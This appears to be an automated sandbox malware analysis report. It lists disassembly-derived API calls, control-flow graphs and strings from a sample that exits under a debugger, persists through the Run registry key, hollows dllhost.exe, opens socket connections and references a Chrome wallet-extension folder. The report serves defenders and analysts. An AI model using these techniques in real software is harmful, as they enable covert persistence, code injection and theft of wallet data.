                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
                      • Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB
                    • OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 04EC48D7
                    • ExitProcess.KERNEL32 ref: 04EC48DF
                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,?), ref: 04EC48FD
                    • _memset.LIBCMT ref: 04EC4916
                    • _memset.LIBCMT ref: 04EC492E
                    • _sprintf.LIBCMT ref: 04EC4940
                    • lstrlenA.KERNEL32(00000000), ref: 04EC49D8
                    • __time64.LIBCMT ref: 04EC49E9
                    • __localtime64.LIBCMT ref: 04EC49F5
                    • _memset.LIBCMT ref: 04EC4A0F
                    • wsprintfA.USER32 ref: 04EC4A3B
                    • CreateMutexA.KERNEL32(00000000,00000001,xYYAgXEhxx), ref: 04EC4A5C
                    • GetLastError.KERNEL32 ref: 04EC4A62
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$Namewsprintf$ComputerCreateDebugErrorExitFileLastModuleMutexOutputProcessString__localtime64__time64_sprintflstrcpylstrlen
                    • String ID: "%s"$%d-%d-%d %d:%d$Blocked$CopyC$Enable$False$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Time$rolyer.update$xYYAgXEhxx
                    • API String ID: 258807487-782532684
                    • Opcode ID: 24621b81ea66740d9bb188eba87ea48dda7a2adb302a1f31449d785764e77136
                    • Instruction ID: a09a3d175d0cce0fc9ce4a1aef54a85622238f5cd7d83fea2b0d9d42703b781c
                    • Opcode Fuzzy Hash: 24621b81ea66740d9bb188eba87ea48dda7a2adb302a1f31449d785764e77136
                    • Instruction Fuzzy Hash: 94612DF1900214AFE710AB60ED56EEB777CDF04309F0451ACFA95A7181EA74BE46CBA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 588 4ec4d60-4ec4e74 call 4eb72f0 * 3 LoadLibraryA GetProcAddress * 5 RegOpenKeyExA 595 4ec4e85-4ec4e8c 588->595 596 4ec4e76-4ec4e80 588->596 597 4ec4ff2-4ec5000 call 4ec5037 595->597 598 4ec4e92 595->598 596->597 610 4ec5009-4ec502a call 4eb21eb 597->610 611 4ec5002-4ec5003 FreeLibrary 597->611 598->597 599 4ec4e99-4ec4ec7 RegQueryValueExA 598->599 600 4ec4fa5-4ec4fcd 598->600 601 4ec4ee6-4ec4f14 598->601 602 4ec4f67-4ec4f95 598->602 599->597 604 4ec4ecd-4ec4ee1 lstrcpyA 599->604 600->597 614 4ec4fcf-4ec4fd3 600->614 601->597 613 4ec4f1a 601->613 602->597 612 4ec4f97-4ec4fa3 602->612 607 4ec4fe8 604->607 607->597 611->610 616 4ec4fd8-4ec4fe5 wsprintfA 612->616 617 4ec4f20-4ec4f23 613->617 614->616 616->607 619 4ec4f4e-4ec4f62 lstrcpyA 617->619 620 4ec4f25-4ec4f4c call 4ec4d20 * 2 call 4eb36a0 617->620 619->607 620->617
                    APIs
                    • _memset.LIBCMT ref: 04EC4DC6
                    • _memset.LIBCMT ref: 04EC4DD9
                    • _memset.LIBCMT ref: 04EC4DEC
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4DF9
                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04EC4E13
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04EC4E21
                    • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04EC4E2F
                    • GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04EC4E37
                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04EC4E3F
                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4E6C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC5003
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$_memset$Library$FreeLoadOpen
                    • String ID: %08X$ADVAPI32.dll$Enable$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                    • API String ID: 1822379937-990719231
                    • Opcode ID: ea602fa1121271c81dd0efe2fab1a48628f4dd345e600a5f806df643588ced8c
                    • Instruction ID: e386bd171cd348f68c5185d6e882ce83420ec4e7ff4c48226a41acb6f29e9d82
                    • Opcode Fuzzy Hash: ea602fa1121271c81dd0efe2fab1a48628f4dd345e600a5f806df643588ced8c
                    • Instruction Fuzzy Hash: 7F714AB1A00228AFDB24DF54DD89FEEB7B8FB48700F005199F549A6280DB74BA85CF50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 742 6d01bde0-6d01be11 socket 743 6d01be17-6d01be6d htonl setsockopt 742->743 744 6d01bffd-6d01c012 call 6d0489c0 742->744 745 6d01be73-6d01be84 bind 743->745 746 6d01bfeb-6d01bffb closesocket * 3 743->746 745->746 748 6d01be8a-6d01be9e getsockname 745->748 746->744 748->746 750 6d01bea4-6d01bea9 748->750 750->746 751 6d01beaf-6d01bebb listen 750->751 751->746 752 6d01bec1-6d01bece socket 751->752 752->746 753 6d01bed4-6d01bee5 connect 752->753 753->746 754 6d01beeb-6d01bef8 call 6d03efa0 753->754 754->746 757 6d01befe-6d01bf31 call 6d018710 accept 754->757 757->746 760 6d01bf37-6d01bf5f call 6cffeec0 send 757->760 763 6d01bf65-6d01bf9a call 6d018710 recv 760->763 766 6d01c013-6d01c015 763->766 767 6d01bf9c-6d01bfd2 WSAGetLastError call 6cffeec0 call 6cffef70 763->767 768 6d01c017-6d01c019 766->768 769 6d01c01e-6d01c02b 766->769 767->746 778 6d01bfd4 767->778 768->763 771 6d01c030-6d01c034 769->771 771->746 773 6d01c036-6d01c03f 771->773 773->771 775 6d01c041-6d01c054 closesocket call 6d0489c0 773->775 779 6d01c059-6d01c05c 775->779 780 6d01bfd6-6d01bfdb 778->780 781 6d01bfdd-6d01bfe5 778->781 780->746 780->781 781->746 781->763
                    APIs
                    • socket.WS2_32 ref: 6D01BE0A
                    • htonl.WS2_32(7F000001), ref: 6D01BE2F
                    • setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000006,00000004), ref: 6D01BE64
                    • bind.WS2_32(00000000,?,00000010), ref: 6D01BE7B
                    • getsockname.WS2_32(00000000,?,00000002), ref: 6D01BE95
                    • listen.WS2_32(00000000,00000001), ref: 6D01BEB2
                    • socket.WS2_32(00000002,00000001,00000000), ref: 6D01BEC7
                    • connect.WS2_32(00000000,?,00000010), ref: 6D01BEDC
                      • Part of subcall function 6D03EFA0: ioctlsocket.WS2_32(00000024,8004667E,00000000), ref: 6D03EFBB
                      • Part of subcall function 6D018710: WSASetLastError.WS2_32(00002726,00000000), ref: 6D01877B
                    • accept.WS2_32(00000000,00000000,00000000), ref: 6D01BF25
                      • Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
                      • Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
                      • Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14
                    • send.WS2_32(?,?,00000010,00000000), ref: 6D01BF5F
                    • recv.WS2_32(FFFFFFFF,?,00000010,00000000), ref: 6D01BF91
                    • WSAGetLastError.WS2_32(?,?,?,?,?,00000001,000003E8,00000000), ref: 6D01BF9C
                    • closesocket.WS2_32(00000000), ref: 6D01BFF2
                    • closesocket.WS2_32(?), ref: 6D01BFF6
                    • closesocket.WS2_32(FFFFFFFF), ref: 6D01BFFB
                    • closesocket.WS2_32(00000000), ref: 6D01C042
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: closesocket$ErrorLastsocket$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@acceptbindconnectgetsocknamehtonlioctlsocketlistenrecvsendsetsockopt
                    • String ID: 3'
                    • API String ID: 3942543284-280543908
                    • Opcode ID: dc9211558428b4ff80b248d46c38388a0cec78272fa877e62c369f72904d0f6c
                    • Instruction ID: 350626b9ae36bbc9c855f13b4d186e6fc66331466612452471ffe631e7ae7633
                    • Opcode Fuzzy Hash: dc9211558428b4ff80b248d46c38388a0cec78272fa877e62c369f72904d0f6c
                    • Instruction Fuzzy Hash: 0B61347150C305AFE3009B75CC84B6AB7B8FF46328F500B29F665E62E1EBB1E5458B52

                    Control-flow Graph

                    APIs
                    • _memset.LIBCMT ref: 04EB201E
                    • CreateProcessA.KERNEL32(00000000,dllhost.exe,00000000,00000000,00000000,00000044,00000000,00000000,?,?), ref: 04EB2051
                    • Wow64GetThreadContext.KERNEL32(?,?), ref: 04EB2078
                    • VirtualAllocEx.KERNEL32(?,00000000,00027400,00001000,00000040), ref: 04EB2093
                    • WriteProcessMemory.KERNEL32(?,00000000,MZER,00027400,00000000), ref: 04EB20AF
                    • Wow64SetThreadContext.KERNEL32(?,00010003), ref: 04EB20C9
                    • ResumeThread.KERNEL32(?), ref: 04EB20D6
                    • CloseHandle.KERNEL32(?), ref: 04EB20E9
                    • CloseHandle.KERNEL32(?), ref: 04EB20F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$CloseContextHandleProcessWow64$AllocCreateMemoryResumeVirtualWrite_memset
                    • String ID: D$MZER$dllhost.exe
                    • API String ID: 93853660-2395381201
                    • Opcode ID: 1427267287002e824d37326d74c782ad9bee5f47cd1793ad0ed7e546def17da8
                    • Instruction ID: a13f0250396e23eec1d3be9b2fc24a27df5030ffd186ac8745a5cbdd2df9c6b0
                    • Opcode Fuzzy Hash: 1427267287002e824d37326d74c782ad9bee5f47cd1793ad0ed7e546def17da8
                    • Instruction Fuzzy Hash: D92131B1A40218ABDB24DB61DC8EF9A7778EB48701F1041D9B709B72C4D6B47E45CF98
                    APIs
                    • select.WS2_32(00000000,?,00000000), ref: 04EC7A48
                    • _memset.LIBCMT ref: 04EC7A65
                    • recv.WS2_32(?,?,00002000,00000000), ref: 04EC7A82
                    • setsockopt.WS2_32 ref: 04EC7AD2
                    • CancelIo.KERNEL32(?), ref: 04EC7ADF
                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 04EC7AEE
                    • closesocket.WS2_32(?), ref: 04EC7AFB
                    • setsockopt.WS2_32 ref: 04EC7B2E
                    • CancelIo.KERNEL32(?), ref: 04EC7B3B
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7B4A
                    • closesocket.WS2_32(?), ref: 04EC7B57
                      • Part of subcall function 04EC7770: wsprintfA.USER32 ref: 04EC7874
                    • SetEvent.KERNEL32(?), ref: 04EC7B64
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CancelExchangeInterlockedclosesocketsetsockopt$Event_memsetrecvselectwsprintf
                    • String ID:
                    • API String ID: 1886666018-0
                    • Opcode ID: 75d3c3220fee3ea60d92378c58fec36ae1314ac9c8bb0f643ec6ec66cf02d5b3
                    • Instruction ID: 48b008f6c80e2d41e11f2768cfa0b3d52cb3cd96ef399b5b407412e1b1051173
                    • Opcode Fuzzy Hash: 75d3c3220fee3ea60d92378c58fec36ae1314ac9c8bb0f643ec6ec66cf02d5b3
                    • Instruction Fuzzy Hash: D24180B1640305ABEB20DF64DC89FD53769FB08711F0046B8BA099E2C6DB74A949CF61
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 716fcec92bc4381fa8a963028cc7853cb03959389aad2f924ff1f22d1a19863b
                    • Instruction ID: 0b2b2369609302dfa5fb560c9864af815695a062b4311427cf4d402fd57776cc
                    • Opcode Fuzzy Hash: 716fcec92bc4381fa8a963028cc7853cb03959389aad2f924ff1f22d1a19863b
                    • Instruction Fuzzy Hash: A012AC716093519FD720DF28C880B6BB7F4EF88308F544A2DF9A9D76A0E771D8068B52
                    APIs
                    • WSASetLastError.WS2_32(00002726,00000000), ref: 6D01877B
                    • WSASetLastError.WS2_32(00002726,?,?,00000000,00000000), ref: 6D0188F4
                    • select.WS2_32(?,?,?,?,00000000), ref: 6D01896C
                    • WSAGetLastError.WS2_32(00000000,00000000), ref: 6D01897D
                    • __WSAFDIsSet.WS2_32(?,?), ref: 6D0189B9
                    • __WSAFDIsSet.WS2_32(?,?), ref: 6D0189EF
                    • __WSAFDIsSet.WS2_32(?,?), ref: 6D018A0D
                    • Sleep.KERNEL32(FFFFFFFE), ref: 6D018A66
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$Sleepselect
                    • String ID:
                    • API String ID: 2806104629-0
                    • Opcode ID: 3a63273308a24cc62f5145429b1017a5bbc525da3f233a1e4cff5ba6e322b803
                    • Instruction ID: f6eb6bd6ab020b8ef04d31f62c4e8bd9e2134f1eef89ebb4483c3b19e1858bfd
                    • Opcode Fuzzy Hash: 3a63273308a24cc62f5145429b1017a5bbc525da3f233a1e4cff5ba6e322b803
                    • Instruction Fuzzy Hash: 3791B13190C342ABF7259FA8DC847AEB6E9FF88714F514A2DE9A9C3190E730C645C752
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,04EF6A00,00000000,?,?,04EC3FFE), ref: 04EC3501
                      • Part of subcall function 04EB29FE: _malloc.LIBCMT ref: 04EB2A18
                    • Process32First.KERNEL32(00000000,00000000), ref: 04EC352A
                    • lstrcmpiA.KERNEL32(00000024,?), ref: 04EC353D
                    • CloseHandle.KERNEL32(00000000), ref: 04EC3585
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_malloclstrcmpi
                    • String ID:
                    • API String ID: 2970433402-0
                    • Opcode ID: ffd0ebf0911f0331c59790a04b890298952c3e666e9b6340d51a017e02151b41
                    • Instruction ID: cce5c8d85f4b4d4705ce9fdf27d2ec6bbb5357ed52fa069de1252e76bffb7de6
                    • Opcode Fuzzy Hash: ffd0ebf0911f0331c59790a04b890298952c3e666e9b6340d51a017e02151b41
                    • Instruction Fuzzy Hash: 9A11BC71A01204A7DB209F56ED49BEB7BBCEF41755F00906DFD4A86200E674ED02D7A2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 366 6cff20d0-6cff2105 IsDebuggerPresent 367 6cff210f-6cff2160 GetModuleFileNameA call 6cff1060 RegOpenKeyExA 366->367 368 6cff2107-6cff2109 ExitProcess 366->368 371 6cff21a5-6cff21e0 GetEnvironmentVariableA 367->371 372 6cff2162-6cff216b 367->372 374 6cff21e3-6cff21e8 371->374 373 6cff2170-6cff2175 372->373 373->373 375 6cff2177-6cff219f RegSetValueExA RegCloseKey 373->375 374->374 376 6cff21ea-6cff2220 call 6cff4940 374->376 375->371 379 6cff2252-6cff2267 call 6cff4b60 376->379 380 6cff2222-6cff2250 call 6d04a3d0 376->380 384 6cff226c-6cff22bf 379->384 380->384 385 6cff22c1-6cff22d0 384->385 386 6cff22f0-6cff2364 LoadLibraryA GetProcAddress CreateFileA GetFileSize 384->386 389 6cff22e6-6cff22ed call 6d0489ce 385->389 390 6cff22d2-6cff22e0 385->390 387 6cff2366-6cff236c 386->387 388 6cff23d1-6cff241f LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress VirtualAlloc 386->388 392 6cff2370-6cff238b call 6cff1e80 387->392 393 6cff2476-6cff248e ReadFile 388->393 394 6cff2421-6cff242a 388->394 389->386 390->389 395 6cff26dc-6cff26f7 call 6d04fce8 390->395 410 6cff238d-6cff2394 Sleep 392->410 411 6cff2396-6cff23cb CreateFileA GetFileSize 392->411 393->394 397 6cff2490-6cff24ed CloseHandle call 6cff4e70 393->397 400 6cff242c-6cff243b 394->400 401 6cff245b-6cff2475 call 6d0489c0 394->401 412 6cff2739-6cff273a 395->412 413 6cff26f9-6cff2707 395->413 417 6cff24f0-6cff254b 397->417 406 6cff243d-6cff244b 400->406 407 6cff2451-6cff2458 call 6d0489ce 400->407 406->407 414 6cff26d7 call 6d04fce8 406->414 407->401 410->392 411->388 418 6cff271b-6cff2732 call 6d0489ce 413->418 419 6cff2709-6cff2717 413->419 414->395 417->417 421 6cff254d-6cff2559 417->421 418->412 422 6cff273b-6cff2740 call 6d04fce8 419->422 423 6cff2719 419->423 425 6cff2563-6cff2585 421->425 423->418 429 6cff258f-6cff25a5 425->429 430 6cff2587-6cff258e 425->430 429->425 431 6cff25a7-6cff25bf 429->431 430->429 432 6cff2649 431->432 433 6cff25c5-6cff25cb 431->433 434 6cff264f-6cff2664 VirtualProtect 432->434 435 6cff25d0-6cff25d7 433->435 440 6cff266c-6cff266e 434->440 436 6cff25d9-6cff25e0 435->436 437 6cff25e1-6cff25ec 435->437 436->437 438 6cff25ee-6cff25f5 437->438 439 6cff25f6-6cff2609 437->439 438->439 441 6cff260b-6cff2611 439->441 442 6cff2612-6cff2639 439->442 443 6cff269f-6cff26a8 440->443 444 6cff2670-6cff2683 440->444 441->442 442->435 446 6cff263b-6cff2647 442->446 443->401 445 6cff26ae-6cff26bd 443->445 447 6cff2695-6cff269c call 6d0489ce 444->447 448 6cff2685-6cff2693 444->448 445->407 449 6cff26c3-6cff26d1 445->449 446->434 447->443 448->414 448->447 449->407 449->414
                    APIs
                    • IsDebuggerPresent.KERNEL32(93BD9D6B), ref: 6CFF20FD
                    • ExitProcess.KERNEL32 ref: 6CFF2109
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6CFF211D
                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,?), ref: 6CFF2158
                    • RegSetValueExA.KERNEL32(?,proxifer.update,00000000,00000001,?,?), ref: 6CFF2193
                    • RegCloseKey.KERNEL32(?), ref: 6CFF219F
                    • GetEnvironmentVariableA.KERNEL32(ALLUSERSPROFILE,?,00000104), ref: 6CFF21B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CloseDebuggerEnvironmentExitFileModuleNameOpenPresentProcessValueVariable
                    • String ID: "%s"$ALLUSERSPROFILE$CreateFileA$Software\Microsoft\Windows\CurrentVersion\Run$VirtualAlloc$VirtualProtect$\krngSwkI6jAYZzGZe.dat$kernel32.dll$proxifer.update
                    • API String ID: 796964146-3908791198
                    • Opcode ID: d7f299f902cf1c8fd4bd1defea95e3c16cb4551e9b633e7ab2f3952ecf7f8f2c
                    • Instruction ID: d53f0527c3193203ea50358900ad8fb94e9e06e0009c702d059ceaddc718bd87
                    • Opcode Fuzzy Hash: d7f299f902cf1c8fd4bd1defea95e3c16cb4551e9b633e7ab2f3952ecf7f8f2c
                    • Instruction Fuzzy Hash: 5A0224B19006589BEB20CF24CC58BEDB7B4FF45305F1482D8E259AB192EB716AC5CF58

                    Control-flow Graph

                    APIs
                    • _memset.LIBCMT ref: 04EC4224
                    • _strncpy.LIBCMT ref: 04EC4241
                    • inet_addr.WS2_32(?), ref: 04EC424D
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
                      • Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
                      • Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
                      • Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB
                    • gethostname.WS2_32(?,00000032), ref: 04EC427C
                    • _strncpy.LIBCMT ref: 04EC428C
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,762323A0,?), ref: 04EC42A4
                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 04EC42C2
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC42CC
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,762323A0), ref: 04EC42E5
                    • _strncpy.LIBCMT ref: 04EC4356
                    • _strncpy.LIBCMT ref: 04EC436D
                    • GetTickCount.KERNEL32 ref: 04EC4375
                    • wsprintfA.USER32 ref: 04EC43C8
                    • _strncpy.LIBCMT ref: 04EC43E1
                    • _strncpy.LIBCMT ref: 04EC4428
                    • _memset.LIBCMT ref: 04EC4445
                    • wsprintfA.USER32 ref: 04EC445F
                    • _strncpy.LIBCMT ref: 04EC4490
                      • Part of subcall function 04EB1AA0: std::_Xinvalid_argument.LIBCPMT ref: 04EB1AB6
                    • GetFileAttributesA.KERNEL32(00000000), ref: 04EC44A1
                    • lstrcpyA.KERNEL32(?,04ECBDE0), ref: 04EC44BC
                    Strings
                    • {CA170F4C-9C78-46c4-9018-2BAD1F52C16F}, xrefs: 04EC4234
                    • C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\, xrefs: 04EC4459
                    • kernel32.dll, xrefs: 04EC429F
                    • GetCurrentProcess, xrefs: 04EC42C4
                    • Remark, xrefs: 04EC4253
                    • IsWow64Process, xrefs: 04EC42B2
                    • Time, xrefs: 04EC43CF
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy$_memset$wsprintf$AddressLibraryProclstrcpy$AttributesComputerCountFileFreeLoadNameTickXinvalid_argumentgethostnameinet_addrstd::_
                    • String ID: C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\$GetCurrentProcess$IsWow64Process$Remark$Time$kernel32.dll${CA170F4C-9C78-46c4-9018-2BAD1F52C16F}
                    • API String ID: 2267238800-1100130286
                    • Opcode ID: daad7806af1b7d9fae8c6bd9f6086a10dd3be2c4610fffecbf0201513812dbce
                    • Instruction ID: 78d86b8a3bccb7bde8201fa6da3f9d7e8575d01c55ef435771a907250fbece9f
                    • Opcode Fuzzy Hash: daad7806af1b7d9fae8c6bd9f6086a10dd3be2c4610fffecbf0201513812dbce
                    • Instruction Fuzzy Hash: D08129B2D002149BDB28EB64DD46BEE7778EB44308F0456ACE909A7281DB707F46CBD5

                    Control-flow Graph

                    APIs
                      • Part of subcall function 04EC7460: WSAStartup.WS2_32(00000202,?), ref: 04EC74B1
                      • Part of subcall function 04EC7460: InitializeCriticalSection.KERNEL32(?), ref: 04EC74BE
                      • Part of subcall function 04EC7460: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC74C9
                      • Part of subcall function 04EC7460: __time64.LIBCMT ref: 04EC74EC
                    • GetTickCount.KERNEL32 ref: 04EC4586
                      • Part of subcall function 04EC7B90: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04EC7BB3
                      • Part of subcall function 04EC7B90: socket.WS2_32 ref: 04EC7BC6
                    • Sleep.KERNEL32(0000EA60,00000000), ref: 04EC45C5
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 04EC45FE
                    • _memset.LIBCMT ref: 04EC4629
                    • _strncpy.LIBCMT ref: 04EC463F
                    • GetTickCount.KERNEL32 ref: 04EC4664
                    • GetTickCount.KERNEL32 ref: 04EC4675
                    • setsockopt.WS2_32 ref: 04EC46B1
                    • CancelIo.KERNEL32(?), ref: 04EC46BF
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC46CF
                    • closesocket.WS2_32(?), ref: 04EC46DD
                    • SetEvent.KERNEL32(?), ref: 04EC46EB
                    • Sleep.KERNEL32 ref: 04EC4707
                    • Sleep.KERNEL32(00000BB8), ref: 04EC4721
